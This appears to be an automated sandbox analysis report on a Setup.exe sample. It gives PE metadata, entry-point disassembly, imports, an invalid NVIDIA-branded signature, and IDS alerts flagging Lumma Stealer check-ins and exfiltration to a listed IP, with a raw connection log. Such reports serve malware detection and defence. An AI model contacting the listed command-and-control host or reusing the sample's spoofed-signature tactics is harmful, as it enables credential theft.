                                                                                                                                      File Type:ASCII text, with no line terminators
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):60
                                                                                                                                      Entropy (8bit):4.038920595031593
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                      File Type:ASCII text, with no line terminators
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):60
                                                                                                                                      Entropy (8bit):4.038920595031593
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                      File Type:ASCII text, with no line terminators
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):60
                                                                                                                                      Entropy (8bit):4.038920595031593
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                      File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                      Entropy (8bit):7.974730718381986
                                                                                                                                      TrID:
                                                                                                                                      • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                                                      • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                                      • DOS Executable Generic (2002/1) 0.02%
                                                                                                                                      • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                      File name:'Setup.exe
                                                                                                                                      File size:1'076'464 bytes
                                                                                                                                      MD5:b00b38068b134113eb53676c33a59a93
                                                                                                                                      SHA1:91a7780b1e6e8600c119abe8b49412bc4234751b
                                                                                                                                      SHA256:5a4692e821ef88f689144312c8f273d7e1599d44e8a26952ff7b9f62c4138f02
                                                                                                                                      SHA512:d1f0909d235f44246882387d2f63ed484aacf4e5a5eb0b131edf662d426a04325a5a8baae0d2a11d5209ca7198416f40e15c27db112f5c2441c0778a7c347d06
                                                                                                                                      SSDEEP:24576:6Owg7Li0laDR3EkuSWHb4rQ6se2hatUdto8cSrUsC:hfq0laDR3EkvmWsdzPcSI
                                                                                                                                      TLSH:9C3533832A9D1A36EC5D8D3227B10D766CBFF46135A18A6F72508553EFC1288BD5C723
                                                                                                                                      File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......A{.k...8...8...8.b<8...8.b,8...8...8...8...8...8..%8...8.."8...8Rich...8........PE..L.....GO.................t...X...B...8.....
Icon Hash: 71e0acc1d2caf818
Entrypoint: 0x4038af
Entrypoint Section: .text
Digitally signed: true
Imagebase: 0x400000
Subsystem: windows gui
Image File Characteristics: EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp: 0x4F47E2E4 [Fri Feb 24 19:20:04 2012 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major: 5
OS Version Minor: 0
File Version Major: 5
File Version Minor: 0
Subsystem Version Major: 5
Subsystem Version Minor: 0
Import Hash: be41bf7b8cc010b614bd36bbca606973
Signature Valid: false
Signature Issuer: CN=DigiCert Trusted G4 Code Signing RSA4096 SHA384 2021 CA1, O="DigiCert, Inc.", C=US
Signature Validation Error: The digital signature of the object did not verify
Error Number: -2146869232
Not Before, Not After:
• 12/01/2023 19:00:00, 16/01/2026 18:59:59
Subject Chain:
• CN=NVIDIA Corporation, OU=2-J, O=NVIDIA Corporation, L=Santa Clara, S=California, C=US
Version: 3
Thumbprint MD5: 5F1B6B6C408DB2B4D60BAA489E9A0E5A
Thumbprint SHA-1: 15F760D82C79D22446CC7D4806540BF632B1E104
Thumbprint SHA-256: 28AF76241322F210DA473D9569EFF6F27124C4CA9F43933DA547E8D068B0A95D
Serial: 0997C56CAA59055394D9A9CDB8BEEB56
Instruction
sub esp, 000002D4h
push ebx
push ebp
push esi
push edi
push 00000020h
xor ebp, ebp
pop esi
mov dword ptr [esp+18h], ebp
mov dword ptr [esp+10h], 0040A268h
mov dword ptr [esp+14h], ebp
call dword ptr [00409030h]
push 00008001h
call dword ptr [004090B4h]
push ebp
call dword ptr [004092C0h]
push 00000008h
mov dword ptr [0047EB98h], eax
call 00007FF5B4B29A6Bh
push ebp
push 000002B4h
mov dword ptr [0047EAB0h], eax
lea eax, dword ptr [esp+38h]
push eax
push ebp
push 0040A264h
call dword ptr [00409184h]
push 0040A24Ch
push 00476AA0h
call 00007FF5B4B2974Dh
call dword ptr [004090B0h]
push eax
mov edi, 004CF0A0h
push edi
call 00007FF5B4B2973Bh
push ebp
call dword ptr [00409134h]
cmp word ptr [004CF0A0h], 0022h
mov dword ptr [0047EAB8h], eax
mov eax, edi
jne 00007FF5B4B2703Ah
push 00000022h
pop esi
mov eax, 004CF0A2h
push esi
push eax
call 00007FF5B4B29411h
push eax
call dword ptr [00409260h]
mov esi, eax
mov dword ptr [esp+1Ch], esi
jmp 00007FF5B4B270C3h
push 00000020h
pop ebx
cmp ax, bx
jne 00007FF5B4B2703Ah
add esi, 02h
cmp word ptr [esi], bx
Programming Language:
• [ C ] VS2008 SP1 build 30729
• [IMP] VS2008 SP1 build 30729
• [ C ] VS2010 SP1 build 40219
• [RES] VS2010 SP1 build 40219
• [LNK] VS2010 SP1 build 40219
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0
IMAGE_DIRECTORY_ENTRY_IMPORT | 0xac40 | 0xb4 | .rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x100000 | 0xe66e | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x1046c8 | 0x2628 | .rsrc
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x86000 | 0x994 | .ndata
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0
IMAGE_DIRECTORY_ENTRY_IAT | 0x9000 | 0x2d0 | .rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0x728c | 0x7400 | 419d4e1be1ac35a5db9c47f553b27cea | False | 0.6566540948275862 | data | 6.499708590628113 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata | 0x9000 | 0x2b6e | 0x2c00 | cca1ca3fbf99570f6de9b43ce767f368 | False | 0.3678977272727273 | data | 4.497932535153822 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data | 0xc000 | 0x72b9c | 0x2000 | 77f0839f8ebea31040e462523e1c770e | False | 0.279296875 | data | 1.8049406284608531 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.ndata | 0x7f000 | 0x81000 | 0x0 | d41d8cd98f00b204e9800998ecf8427e | False | 0 | empty | 0.0 | IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc | 0x100000 | 0xe66e | 0xe800 | 7f2c69839a8806dd58af4dece8b3703e | False | 0.9127828663793104 | data | 7.6649981349228025 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc | 0x10f000 | 0xfd6 | 0x1000 | e41970182a891ebf16d86470af3ecf01 | False | 0.597900390625 | data | 5.583890657569535 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_ICON | 0x100220 | 0x8ac2 | PNG image data, 128 x 128, 8-bit/color RGBA, non-interlaced | English | United States | 1.0005911829288892
RT_ICON | 0x108ce4 | 0x2928 | PNG image data, 64 x 64, 8-bit/color RGBA, non-interlaced | English | United States | 1.001044039483675
RT_ICON | 0x10b60c | 0x2668 | Device independent bitmap graphic, 48 x 96 x 32, image size 9792 | English | United States | 0.616253051261188
RT_ICON | 0x10dc74 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 1088 | English | United States | 0.7562056737588653
RT_DIALOG | 0x10e0dc | 0x100 | data | English | United States | 0.5234375
RT_DIALOG | 0x10e1dc | 0x11c | data | English | United States | 0.6056338028169014
RT_DIALOG | 0x10e2f8 | 0x60 | data | English | United States | 0.7291666666666666
RT_GROUP_ICON | 0x10e358 | 0x3e | data | English | United States | 0.8225806451612904
RT_MANIFEST | 0x10e398 | 0x2d6 | XML 1.0 document, ASCII text, with very long lines (726), with no line terminators | English | United States | 0.5647382920110193
DLL | Import
KERNEL32.dll | SetFileTime, CompareFileTime, SearchPathW, GetShortPathNameW, GetFullPathNameW, MoveFileW, SetCurrentDirectoryW, GetFileAttributesW, GetLastError, CreateDirectoryW, SetFileAttributesW, Sleep, GetTickCount, GetFileSize, GetModuleFileNameW, GetCurrentProcess, CopyFileW, ExitProcess, GetWindowsDirectoryW, GetTempPathW, GetCommandLineW, SetErrorMode, lstrcpynA, CloseHandle, lstrcpynW, GetDiskFreeSpaceW, GlobalUnlock, GlobalLock, CreateThread, LoadLibraryW, CreateProcessW, lstrcmpiA, CreateFileW, GetTempFileNameW, lstrcatW, GetProcAddress, LoadLibraryA, GetModuleHandleA, OpenProcess, lstrcpyW, GetVersionExW, GetSystemDirectoryW, GetVersion, lstrcpyA, RemoveDirectoryW, lstrcmpA, lstrcmpiW, lstrcmpW, ExpandEnvironmentStringsW, GlobalAlloc, WaitForSingleObject, GetExitCodeProcess, GlobalFree, GetModuleHandleW, LoadLibraryExW, FreeLibrary, WritePrivateProfileStringW, GetPrivateProfileStringW, WideCharToMultiByte, lstrlenA, MulDiv, WriteFile, ReadFile, MultiByteToWideChar, SetFilePointer, FindClose, FindNextFileW, FindFirstFileW, DeleteFileW, lstrlenW
USER32.dll | GetAsyncKeyState, IsDlgButtonChecked, ScreenToClient, GetMessagePos, CallWindowProcW, IsWindowVisible, LoadBitmapW, CloseClipboard, SetClipboardData, EmptyClipboard, OpenClipboard, TrackPopupMenu, GetWindowRect, AppendMenuW, CreatePopupMenu, GetSystemMetrics, EndDialog, EnableMenuItem, GetSystemMenu, SetClassLongW, IsWindowEnabled, SetWindowPos, DialogBoxParamW, CheckDlgButton, CreateWindowExW, SystemParametersInfoW, RegisterClassW, SetDlgItemTextW, GetDlgItemTextW, MessageBoxIndirectW, CharNextA, CharUpperW, CharPrevW, wvsprintfW, DispatchMessageW, PeekMessageW, wsprintfA, DestroyWindow, CreateDialogParamW, SetTimer, SetWindowTextW, PostQuitMessage, SetForegroundWindow, ShowWindow, wsprintfW, SendMessageTimeoutW, LoadCursorW, SetCursor, GetWindowLongW, GetSysColor, CharNextW, GetClassInfoW, ExitWindowsEx, IsWindow, GetDlgItem, SetWindowLongW, LoadImageW, GetDC, EnableWindow, InvalidateRect, SendMessageW, DefWindowProcW, BeginPaint, GetClientRect, FillRect, DrawTextW, EndPaint, FindWindowExW
GDI32.dll | SetBkColor, GetDeviceCaps, DeleteObject, CreateBrushIndirect, CreateFontIndirectW, SetBkMode, SetTextColor, SelectObject
SHELL32.dll | SHBrowseForFolderW, SHGetPathFromIDListW, SHGetFileInfoW, ShellExecuteW, SHFileOperationW, SHGetSpecialFolderLocation
ADVAPI32.dll | RegEnumKeyW, RegOpenKeyExW, RegCloseKey, RegDeleteKeyW, RegDeleteValueW, RegCreateKeyExW, RegSetValueExW, RegQueryValueExW, RegEnumValueW
COMCTL32.dll | ImageList_AddMasked, ImageList_Destroy, ImageList_Create
ole32.dll | CoTaskMemFree, OleInitialize, OleUninitialize, CoCreateInstance
VERSION.dll | GetFileVersionInfoSizeW, GetFileVersionInfoW, VerQueryValueW
Language of compilation system | Country where language is spoken | Map
English | United States |
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2024-11-29T15:12:37.057575+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.5 | 49754 | 104.21.63.229 | 443 | TCP
2024-11-29T15:12:39.594075+0100 | 2049836 | ET MALWARE Lumma Stealer Related Activity | 1 | 192.168.2.5 | 49754 | 104.21.63.229 | 443 | TCP
2024-11-29T15:12:39.594075+0100 | 2054653 | ET MALWARE Lumma Stealer CnC Host Checkin | 1 | 192.168.2.5 | 49754 | 104.21.63.229 | 443 | TCP
2024-11-29T15:12:40.949212+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.5 | 49764 | 104.21.63.229 | 443 | TCP
2024-11-29T15:12:43.897693+0100 | 2049812 | ET MALWARE Lumma Stealer Related Activity M2 | 1 | 192.168.2.5 | 49764 | 104.21.63.229 | 443 | TCP
2024-11-29T15:12:43.897693+0100 | 2054653 | ET MALWARE Lumma Stealer CnC Host Checkin | 1 | 192.168.2.5 | 49764 | 104.21.63.229 | 443 | TCP
2024-11-29T15:12:45.509385+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.5 | 49775 | 104.21.63.229 | 443 | TCP
2024-11-29T15:12:49.811182+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.5 | 49786 | 104.21.63.229 | 443 | TCP
2024-11-29T15:12:54.229858+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.5 | 49797 | 104.21.63.229 | 443 | TCP
2024-11-29T15:12:58.720720+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.5 | 49809 | 104.21.63.229 | 443 | TCP
2024-11-29T15:13:02.934746+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.5 | 49819 | 104.21.63.229 | 443 | TCP
2024-11-29T15:13:05.438371+0100 | 2048094 | ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration | 1 | 192.168.2.5 | 49819 | 104.21.63.229 | 443 | TCP
2024-11-29T15:13:06.798162+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.5 | 49826 | 104.21.63.229 | 443 | TCP
2024-11-29T15:13:11.123645+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.5 | 49837 | 104.21.63.229 | 443 | TCP
2024-11-29T15:13:14.067850+0100 | 2054653 | ET MALWARE Lumma Stealer CnC Host Checkin | 1 | 192.168.2.5 | 49837 | 104.21.63.229 | 443 | TCP
2024-11-29T15:13:15.518575+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.5 | 49848 | 104.20.4.235 | 443 | TCP
2024-11-29T15:13:18.026067+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.5 | 49854 | 104.21.58.9 | 443 | TCP
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Nov 29, 2024 15:12:35.838872910 CET | 49754 | 443 | 192.168.2.5 | 104.21.63.229
Nov 29, 2024 15:12:35.838897943 CET | 443 | 49754 | 104.21.63.229 | 192.168.2.5
Nov 29, 2024 15:12:35.838977098 CET | 49754 | 443 | 192.168.2.5 | 104.21.63.229
Nov 29, 2024 15:12:35.840168953 CET | 49754 | 443 | 192.168.2.5 | 104.21.63.229
Nov 29, 2024 15:12:35.840182066 CET | 443 | 49754 | 104.21.63.229 | 192.168.2.5
Nov 29, 2024 15:12:37.057482004 CET | 443 | 49754 | 104.21.63.229 | 192.168.2.5
Nov 29, 2024 15:12:37.057574987 CET | 49754 | 443 | 192.168.2.5 | 104.21.63.229
Nov 29, 2024 15:12:37.061446905 CET | 49754 | 443 | 192.168.2.5 | 104.21.63.229
Nov 29, 2024 15:12:37.061455011 CET | 443 | 49754 | 104.21.63.229 | 192.168.2.5
Nov 29, 2024 15:12:37.061677933 CET | 443 | 49754 | 104.21.63.229 | 192.168.2.5
Nov 29, 2024 15:12:37.108478069 CET | 49754 | 443 | 192.168.2.5 | 104.21.63.229
Nov 29, 2024 15:12:37.109428883 CET | 49754 | 443 | 192.168.2.5 | 104.21.63.229
Nov 29, 2024 15:12:37.109457016 CET | 49754 | 443 | 192.168.2.5 | 104.21.63.229
Nov 29, 2024 15:12:37.109488010 CET | 443 | 49754 | 104.21.63.229 | 192.168.2.5
Nov 29, 2024 15:12:39.594079018 CET | 443 | 49754 | 104.21.63.229 | 192.168.2.5
Nov 29, 2024 15:12:39.594161987 CET | 443 | 49754 | 104.21.63.229 | 192.168.2.5
Nov 29, 2024 15:12:39.594288111 CET | 49754 | 443 | 192.168.2.5 | 104.21.63.229
Nov 29, 2024 15:12:39.596088886 CET | 49754 | 443 | 192.168.2.5 | 104.21.63.229
Nov 29, 2024 15:12:39.596100092 CET | 443 | 49754 | 104.21.63.229 | 192.168.2.5
Nov 29, 2024 15:12:39.596117973 CET | 49754 | 443 | 192.168.2.5 | 104.21.63.229
Nov 29, 2024 15:12:39.596122980 CET | 443 | 49754 | 104.21.63.229 | 192.168.2.5
Nov 29, 2024 15:12:39.640892029 CET | 49764 | 443 | 192.168.2.5 | 104.21.63.229
Nov 29, 2024 15:12:39.640917063 CET | 443 | 49764 | 104.21.63.229 | 192.168.2.5
                                                                                                                                      Nov 29, 2024 15:12:39.641021967 CET49764443192.168.2.5104.21.63.229
                                                                                                                                      Nov 29, 2024 15:12:39.641318083 CET49764443192.168.2.5104.21.63.229
                                                                                                                                      Nov 29, 2024 15:12:39.641329050 CET44349764104.21.63.229192.168.2.5
                                                                                                                                      Nov 29, 2024 15:12:40.949135065 CET44349764104.21.63.229192.168.2.5
                                                                                                                                      Nov 29, 2024 15:12:40.949212074 CET49764443192.168.2.5104.21.63.229
                                                                                                                                      Nov 29, 2024 15:12:40.950412035 CET49764443192.168.2.5104.21.63.229
                                                                                                                                      Nov 29, 2024 15:12:40.950422049 CET44349764104.21.63.229192.168.2.5
                                                                                                                                      Nov 29, 2024 15:12:40.950623035 CET44349764104.21.63.229192.168.2.5
                                                                                                                                      Nov 29, 2024 15:12:40.951803923 CET49764443192.168.2.5104.21.63.229
                                                                                                                                      Nov 29, 2024 15:12:40.951833963 CET49764443192.168.2.5104.21.63.229
                                                                                                                                      Nov 29, 2024 15:12:40.951864004 CET44349764104.21.63.229192.168.2.5
                                                                                                                                      Nov 29, 2024 15:12:43.897701025 CET44349764104.21.63.229192.168.2.5
                                                                                                                                      Nov 29, 2024 15:12:43.897744894 CET44349764104.21.63.229192.168.2.5
                                                                                                                                      Nov 29, 2024 15:12:43.897772074 CET44349764104.21.63.229192.168.2.5
                                                                                                                                      Nov 29, 2024 15:12:43.897810936 CET49764443192.168.2.5104.21.63.229
                                                                                                                                      Nov 29, 2024 15:12:43.897819996 CET44349764104.21.63.229192.168.2.5
                                                                                                                                      Nov 29, 2024 15:12:43.897871971 CET49764443192.168.2.5104.21.63.229
                                                                                                                                      Nov 29, 2024 15:12:43.897876024 CET44349764104.21.63.229192.168.2.5
                                                                                                                                      Nov 29, 2024 15:12:43.906193972 CET44349764104.21.63.229192.168.2.5
                                                                                                                                      Nov 29, 2024 15:12:43.906244993 CET49764443192.168.2.5104.21.63.229
                                                                                                                                      Nov 29, 2024 15:12:43.906249046 CET44349764104.21.63.229192.168.2.5
                                                                                                                                      Nov 29, 2024 15:12:43.914602995 CET44349764104.21.63.229192.168.2.5
                                                                                                                                      Nov 29, 2024 15:12:43.914653063 CET49764443192.168.2.5104.21.63.229
                                                                                                                                      Nov 29, 2024 15:12:43.914657116 CET44349764104.21.63.229192.168.2.5
                                                                                                                                      Nov 29, 2024 15:12:43.923010111 CET44349764104.21.63.229192.168.2.5
                                                                                                                                      Nov 29, 2024 15:12:43.923063993 CET49764443192.168.2.5104.21.63.229
                                                                                                                                      Nov 29, 2024 15:12:43.923069954 CET44349764104.21.63.229192.168.2.5
                                                                                                                                      Nov 29, 2024 15:12:43.968008041 CET49764443192.168.2.5104.21.63.229
                                                                                                                                      Nov 29, 2024 15:12:44.017822027 CET44349764104.21.63.229192.168.2.5
                                                                                                                                      Nov 29, 2024 15:12:44.061605930 CET49764443192.168.2.5104.21.63.229
                                                                                                                                      Nov 29, 2024 15:12:44.108505964 CET44349764104.21.63.229192.168.2.5
                                                                                                                                      Nov 29, 2024 15:12:44.108562946 CET44349764104.21.63.229192.168.2.5
                                                                                                                                      Nov 29, 2024 15:12:44.108639002 CET44349764104.21.63.229192.168.2.5
                                                                                                                                      Nov 29, 2024 15:12:44.108690977 CET49764443192.168.2.5104.21.63.229
                                                                                                                                      Nov 29, 2024 15:12:44.109556913 CET49764443192.168.2.5104.21.63.229
                                                                                                                                      Nov 29, 2024 15:12:44.109561920 CET44349764104.21.63.229192.168.2.5
                                                                                                                                      Nov 29, 2024 15:12:44.109580994 CET49764443192.168.2.5104.21.63.229
                                                                                                                                      Nov 29, 2024 15:12:44.109584093 CET44349764104.21.63.229192.168.2.5
                                                                                                                                      Nov 29, 2024 15:12:44.297849894 CET49775443192.168.2.5104.21.63.229
                                                                                                                                      Nov 29, 2024 15:12:44.297869921 CET44349775104.21.63.229192.168.2.5
                                                                                                                                      Nov 29, 2024 15:12:44.297967911 CET49775443192.168.2.5104.21.63.229
                                                                                                                                      Nov 29, 2024 15:12:44.298301935 CET49775443192.168.2.5104.21.63.229
                                                                                                                                      Nov 29, 2024 15:12:44.298310995 CET44349775104.21.63.229192.168.2.5
                                                                                                                                      Nov 29, 2024 15:12:45.509279013 CET44349775104.21.63.229192.168.2.5
                                                                                                                                      Nov 29, 2024 15:12:45.509385109 CET49775443192.168.2.5104.21.63.229
                                                                                                                                      Nov 29, 2024 15:12:45.510791063 CET49775443192.168.2.5104.21.63.229
                                                                                                                                      Nov 29, 2024 15:12:45.510802984 CET44349775104.21.63.229192.168.2.5
                                                                                                                                      Nov 29, 2024 15:12:45.511051893 CET44349775104.21.63.229192.168.2.5
                                                                                                                                      Nov 29, 2024 15:12:45.512296915 CET49775443192.168.2.5104.21.63.229
                                                                                                                                      Nov 29, 2024 15:12:45.512466908 CET49775443192.168.2.5104.21.63.229
                                                                                                                                      Nov 29, 2024 15:12:45.512501001 CET44349775104.21.63.229192.168.2.5
                                                                                                                                      Nov 29, 2024 15:12:48.395212889 CET44349775104.21.63.229192.168.2.5
                                                                                                                                      Nov 29, 2024 15:12:48.395291090 CET44349775104.21.63.229192.168.2.5
                                                                                                                                      Nov 29, 2024 15:12:48.395610094 CET49775443192.168.2.5104.21.63.229
                                                                                                                                      Nov 29, 2024 15:12:48.395653009 CET49775443192.168.2.5104.21.63.229
                                                                                                                                      Nov 29, 2024 15:12:48.505635977 CET49786443192.168.2.5104.21.63.229
                                                                                                                                      Nov 29, 2024 15:12:48.505660057 CET44349786104.21.63.229192.168.2.5
                                                                                                                                      Nov 29, 2024 15:12:48.505783081 CET49786443192.168.2.5104.21.63.229
                                                                                                                                      Nov 29, 2024 15:12:48.506244898 CET49786443192.168.2.5104.21.63.229
                                                                                                                                      Nov 29, 2024 15:12:48.506256104 CET44349786104.21.63.229192.168.2.5
                                                                                                                                      Nov 29, 2024 15:12:49.811028957 CET44349786104.21.63.229192.168.2.5
                                                                                                                                      Nov 29, 2024 15:12:49.811182022 CET49786443192.168.2.5104.21.63.229
                                                                                                                                      Nov 29, 2024 15:12:49.813070059 CET49786443192.168.2.5104.21.63.229
                                                                                                                                      Nov 29, 2024 15:12:49.813076019 CET44349786104.21.63.229192.168.2.5
                                                                                                                                      Nov 29, 2024 15:12:49.813293934 CET44349786104.21.63.229192.168.2.5
                                                                                                                                      Nov 29, 2024 15:12:49.814606905 CET49786443192.168.2.5104.21.63.229
                                                                                                                                      Nov 29, 2024 15:12:49.814759970 CET49786443192.168.2.5104.21.63.229
                                                                                                                                      Nov 29, 2024 15:12:49.814785004 CET44349786104.21.63.229192.168.2.5
                                                                                                                                      Nov 29, 2024 15:12:49.814848900 CET49786443192.168.2.5104.21.63.229
                                                                                                                                      Nov 29, 2024 15:12:49.855335951 CET44349786104.21.63.229192.168.2.5
                                                                                                                                      Nov 29, 2024 15:12:52.703653097 CET44349786104.21.63.229192.168.2.5
                                                                                                                                      Nov 29, 2024 15:12:52.703742981 CET44349786104.21.63.229192.168.2.5
                                                                                                                                      Nov 29, 2024 15:12:52.703839064 CET49786443192.168.2.5104.21.63.229
                                                                                                                                      Nov 29, 2024 15:12:52.704005957 CET49786443192.168.2.5104.21.63.229
                                                                                                                                      Nov 29, 2024 15:12:52.704020023 CET44349786104.21.63.229192.168.2.5
                                                                                                                                      Nov 29, 2024 15:12:52.926359892 CET49797443192.168.2.5104.21.63.229
                                                                                                                                      Nov 29, 2024 15:12:52.926397085 CET44349797104.21.63.229192.168.2.5
                                                                                                                                      Nov 29, 2024 15:12:52.926477909 CET49797443192.168.2.5104.21.63.229
                                                                                                                                      Nov 29, 2024 15:12:52.926821947 CET49797443192.168.2.5104.21.63.229
                                                                                                                                      Nov 29, 2024 15:12:52.926836967 CET44349797104.21.63.229192.168.2.5
                                                                                                                                      Nov 29, 2024 15:12:54.229733944 CET44349797104.21.63.229192.168.2.5
                                                                                                                                      Nov 29, 2024 15:12:54.229857922 CET49797443192.168.2.5104.21.63.229
                                                                                                                                      Nov 29, 2024 15:12:54.231275082 CET49797443192.168.2.5104.21.63.229
                                                                                                                                      Nov 29, 2024 15:12:54.231281996 CET44349797104.21.63.229192.168.2.5
                                                                                                                                      Nov 29, 2024 15:12:54.231498957 CET44349797104.21.63.229192.168.2.5
                                                                                                                                      Nov 29, 2024 15:12:54.232964993 CET49797443192.168.2.5104.21.63.229
                                                                                                                                      Nov 29, 2024 15:12:54.233153105 CET49797443192.168.2.5104.21.63.229
                                                                                                                                      Nov 29, 2024 15:12:54.233180046 CET44349797104.21.63.229192.168.2.5
                                                                                                                                      Nov 29, 2024 15:12:54.233247995 CET49797443192.168.2.5104.21.63.229
                                                                                                                                      Nov 29, 2024 15:12:54.233253956 CET44349797104.21.63.229192.168.2.5
                                                                                                                                      Nov 29, 2024 15:12:57.316625118 CET44349797104.21.63.229192.168.2.5
                                                                                                                                      Nov 29, 2024 15:12:57.316705942 CET44349797104.21.63.229192.168.2.5
                                                                                                                                      Nov 29, 2024 15:12:57.316797018 CET49797443192.168.2.5104.21.63.229
                                                                                                                                      Nov 29, 2024 15:12:57.317084074 CET49797443192.168.2.5104.21.63.229
                                                                                                                                      Nov 29, 2024 15:12:57.317101002 CET44349797104.21.63.229192.168.2.5
                                                                                                                                      Nov 29, 2024 15:12:57.456836939 CET49809443192.168.2.5104.21.63.229
                                                                                                                                      Nov 29, 2024 15:12:57.456876040 CET44349809104.21.63.229192.168.2.5
                                                                                                                                      Nov 29, 2024 15:12:57.456974983 CET49809443192.168.2.5104.21.63.229
                                                                                                                                      Nov 29, 2024 15:12:57.457307100 CET49809443192.168.2.5104.21.63.229
                                                                                                                                      Nov 29, 2024 15:12:57.457312107 CET44349809104.21.63.229192.168.2.5
                                                                                                                                      Nov 29, 2024 15:12:58.720643044 CET44349809104.21.63.229192.168.2.5
